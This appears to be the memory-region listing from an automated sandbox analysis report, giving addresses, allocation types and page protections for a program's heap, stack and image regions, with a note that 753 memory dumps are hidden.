page read and write
DEE000
stack
page read and write
A5F7F7000
stack
page read and write
287D000
heap
page read and write
432000
unkown
page readonly
2061F23F000
heap
page read and write
471000
unkown
page write copy
B498C7C000
stack
page read and write
3CCE000
trusted library allocation
page read and write
2BB6000
unkown
page read and write
20619C9F000
heap
page read and write
2334000
unkown
page read and write
20619CB0000
heap
page read and write
413000
unkown
page readonly
29FC000
heap
page read and write
2980000
heap
page read and write
3F65000
unkown
page read and write
2BB6000
unkown
page read and write
2BB6000
unkown
page read and write
4F20000
direct allocation
page read and write
1F7D9440000
heap
page read and write
1F7D7A5E000
heap
page read and write
2BB6000
unkown
page read and write
19D000
stack
page read and write
2A7C000
heap
page read and write
387B000
unkown
page read and write
29F8000
heap
page read and write
2CE0000
heap
page read and write
6FA40000
unkown
page readonly
1F7D79BE000
heap
page read and write
348B000
heap
page read and write
4749000
heap
page read and write
339E000
heap
page read and write
2061F257000
heap
page read and write
5CB1000
unkown
page read and write
2BB6000
unkown
page read and write
3E04000
unkown
page read and write
2BB6000
unkown
page read and write
2061F150000
trusted library allocation
page read and write
DD4000
heap
page read and write
B49967E000
unkown
page readonly
2E10000
direct allocation
page read and write
2BB8000
heap
page read and write
3FB0000
unkown
page read and write
CF6000
heap
page read and write
401000
unkown
page execute read
2FB0000
heap
page read and write
29A9000
heap
page read and write
2F90000
unkown
page read and write
2430000
direct allocation
page read and write
482000
unkown
page write copy
6FAF5000
unkown
page read and write
2BB6000
unkown
page read and write
2061F1A0000
remote allocation
page read and write
478000
unkown
page readonly
34B4000
unkown
page read and write
2D1E000
stack
page read and write
5049000
direct allocation
page read and write
E23000
heap
page read and write
CF6000
heap
page read and write
5CB0000
unkown
page read and write
2061F570000
trusted library allocation
page read and write
5119000
direct allocation
page read and write
2061F271000
heap
page read and write
32B0000
heap
page read and write
3EF0000
unkown
page read and write
2334000
unkown
page read and write
1F7D7A75000
heap
page read and write
553E000
unkown
page read and write
B499F7D000
stack
page read and write
20619B50000
trusted library allocation
page read and write
2979000
heap
page read and write
23BE000
unkown
page read and write
2981000
heap
page read and write
9C000
stack
page read and write
2061F040000
trusted library allocation
page read and write
B49947E000
unkown
page readonly
8A2000
unkown
page read and write
34D1000
heap
page read and write
B49937E000
stack
page read and write
440000
heap
page read and write
B498D7E000
unkown
page readonly
1039000
heap
page read and write
2334000
unkown
page read and write
2BB6000
unkown
page read and write
29D0000
unkown
page read and write
4982000
trusted library allocation
page read and write
D22000
heap
page read and write
27FA000
heap
page read and write
20619C77000
heap
page read and write
2061F297000
heap
page read and write
2334000
unkown
page read and write
2581000
heap
page read and write
1001000
heap
page read and write
34B4000
unkown
page read and write
2061F253000
heap
page read and write
2A40000
unkown
page read and write
49B7000
heap
page read and write
400000
unkown
page readonly
2CE8000
heap
page read and write
B497FBB000
stack
page read and write
19D000
stack
page read and write
There are 753 hidden memdumps, click here to show them.